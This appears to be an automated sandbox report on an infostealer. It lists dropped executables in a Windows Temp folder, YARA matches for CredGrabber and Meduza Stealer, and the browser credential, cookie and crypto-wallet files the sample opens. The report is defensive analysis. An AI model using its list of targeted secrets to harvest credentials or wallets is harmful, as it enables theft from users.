Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Temp\ochicikt.z2z.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Temp\inyligbs.qlq.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\Temp\t0ppkxxj.rwu.exe

Key value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation TimeZoneKeyName

Source: C:\Windows\Temp\t0ppkxxj.rwu.exe

Code function: 26_2_00007FF6218A840C GetSystemTimeAsFileTime,

26_2_00007FF6218A840C

Source: C:\Windows\Temp\t0ppkxxj.rwu.exe

Code function: 26_2_00007FF621896150 GetUserNameW,

26_2_00007FF621896150

Source: C:\Windows\Temp\t0ppkxxj.rwu.exe

Code function: 26_2_00007FF6218976A0 GetTimeZoneInformation,

26_2_00007FF6218976A0

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected CredGrabber

Source: Yara match

File source: Process Memory Space: t0ppkxxj.rwu.exe PID: 6796, type: MEMORYSTR

Yara detected Meduza Stealer

Source: Yara match	File source: 26.0.t0ppkxxj.rwu.exe.7ff621810000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.0.5mg21dmq.1jt.exe.7ff786a20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.0.ochicikt.z2z.exe.7ff741a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.inyligbs.qlq.exe.7ff7cee60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.ochicikt.z2z.exe.7ff741a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.inyligbs.qlq.exe.7ff7cee60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.t0ppkxxj.rwu.exe.7ff621810000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.5mg21dmq.1jt.exe.7ff786a20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001C.00000002.1958069772.000001C3CD9C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.1919727858.0000023773BFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.1965863333.000002BDB06EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: t0ppkxxj.rwu.exe PID: 6796, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ochicikt.z2z.exe PID: 7480, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: inyligbs.qlq.exe PID: 7608, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 5mg21dmq.1jt.exe PID: 7640, type: MEMORYSTR
Source: Yara match	File source: C:\Windows\Temp\5mg21dmq.1jt.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\Temp\inyligbs.qlq.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\Temp\ochicikt.z2z.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\Temp\t0ppkxxj.rwu.exe, type: DROPPED

Found many strings related to Crypto-Wallets (likely being stolen)

Source: t0ppkxxj.rwu.exe, 0000001A.00000002.2156752778.00000220D6ABC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Electrum-LTC\config
Source: t0ppkxxj.rwu.exe, 0000001A.00000002.2156752778.00000220D6ABC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ElectronCash\config
Source: t0ppkxxj.rwu.exe, 0000001A.00000003.1939244646.00000220D6B83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Ny1aaXAgMjMuMDEgKHg2NCkgWzIzLjAxXQpNb3ppbGxhIEZpcmVmb3ggKHg2NCBlbi1VUykgWzExOC4wLjFdCk1vemlsbGEgTWFpbnRlbmFuY2UgU2VydmljZSBbMTE4LjAuMV0KTWljcm9zb2Z0IE9mZmljZSBQcm9mZXNzaW9uYWwgUGx1cyAyMDE5IC0gZW4tdXMgWzE2LjAuMTY4MjcuMjAxMzBdCk1pY3Jvc29mdCBWaXN1YWwgQysrIDIwMjIgWDY0IEFkZGl0aW9uYWwgUnVudGltZSAtIDE0LjM2LjMyNTMyIFsxNC4zNi4zMjUzMl0KT2ZmaWNlIDE2IENsaWNrLXRvLVJ1biBMaWNlbnNpbmcgQ29tcG9uZW50IFsxNi4wLjE2ODI3LjIwMTMwXQpPZmZpY2UgMTYgQ2xpY2stdG8tUnVuIEV4dGVuc2liaWxpdHkgQ29tcG9uZW50IDY0LWJpdCBSZWdpc3RyYXRpb24gWzE2LjAuMTY4MjcuMjAwNTZdCkFkb2JlIEFjcm9iYXQgKDY0LWJpdCkgWzIzLjAwNi4yMDMyMF0KTWljcm9zb2Z0IFZpc3VhbCBDKysgMjAyMiBYNjQgTWluaW11bSBSdW50aW1lIC0gMTQuMzYuMzI1MzIgWzE0LjM2LjMyNTMyXQpHb29nbGUgQ2hyb21lIFsxMTcuMC41OTM4LjEzMl0KTWljcm9zb2Z0IEVkZ2UgWzExNy4wLjIwNDUuNDddCk1pY3Jvc29mdCBFZGdlIFVwZGF0ZSBbMS4zLjE3Ny4xMV0KTWljcm9zb2Z0IEVkZ2UgV2ViVmlldzIgUnVudGltZSBbMTE3LjAuMjA0NS40N10KSmF2YSBBdXRvIFVwZGF0ZXIgWzIuOC4zODEuOV0KSmF2YSA4IFVwZGF0ZSAzODEgWzguMC4zODEwLjldCk1pY3Jvc29mdCBWaXN1YWwgQysrIDIwMTUtMjAyMiBSZWRpc3RyaWJ1dGFibGUgKHg2NCkgLSAxNC4zNi4zMjUzMiBbMTQuMzYuMzI1MzIuMF0KT2ZmaWNlIDE2IENsaWNrLXRvLVJ1biBFeHRlbnNpYmlsaXR5IENvbXBvbmVudCBbMTYuMC4xNjgyNy4yMDEzMF0K
Source: t0ppkxxj.rwu.exe, 0000001A.00000002.2156752778.00000220D6ABC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Exodus\exodus.wallet
Source: t0ppkxxj.rwu.exe, 0000001A.00000002.2156752778.00000220D6ABC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Ethereum\keystore
Source: powershell.exe, 00000006.00000002.1787640504.0000000005577000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: # AutoUnlockKeyStored. Win32_EncryptableVolume::IsAutoUnlockKeyStored

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\Temp\t0ppkxxj.rwu.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG.old
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOCK
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\CURRENT
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\MANIFEST-000001
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
